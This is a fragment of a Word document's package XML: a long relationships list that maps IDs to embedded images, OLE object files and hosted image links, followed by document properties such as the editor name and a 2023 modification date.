Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.jpeg"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.jpeg"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.jpeg"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.jpeg"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.jpeg"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image213.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.jpeg"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.jpeg"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.emf"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject38.bin"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.emf"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject37.bin"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.emf"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject36.bin"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.emf"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject35.bin"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.emf"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject34.bin"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject33.bin"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.emf"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject32.bin"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.emf"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject31.bin"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.emf"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject30.bin"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.emf"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject29.bin"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.emf"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject28.bin"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.jpeg"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.jpeg"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.emf"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject27.bin"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.emf"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject26.bin"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.emf"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject25.bin"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.emf"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject24.bin"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.emf"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject23.bin"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject22.bin"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.emf"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject21.bin"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.emf"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject20.bin"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.emf"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject19.bin"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.emf"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject18.bin"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject17.bin"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.emf"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject16.bin"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.emf"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject15.bin"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.emf"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject14.bin"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.emf"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject13.bin"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.emf"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject12.bin"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.emf"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject11.bin"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.emf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oleObject" Target="embeddings/oleObject10.bin"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.emf"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject9.bin"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpeg"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.jpeg"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject8.bin"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.jpeg"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.emf"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject7.bin"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpeg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.emf"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.jpeg"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.emf"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpeg"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.jpeg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.emf"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpeg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.emf"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.emf"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.emf"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpeg"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165421167.png" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165440154.png" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150739909.png" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164831182.png" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164743194.png" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164711413.png" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164633833.png" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164520715.png" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164421580.png" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150418307.png" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106170933578.png" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164245476.png" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164202327.png" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164026340.png" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163836193.png" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65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Office_12.1.0.15324_F1E327BC-269C-435d-A152-05C5408002CA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宋佳兴</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-04T09:46:33Z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2052-12.1.0.15324</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>2A448A534420464EB482FE7C8FF16D06_12</vt:lpwstr>
  </property>
</Properties>
</file>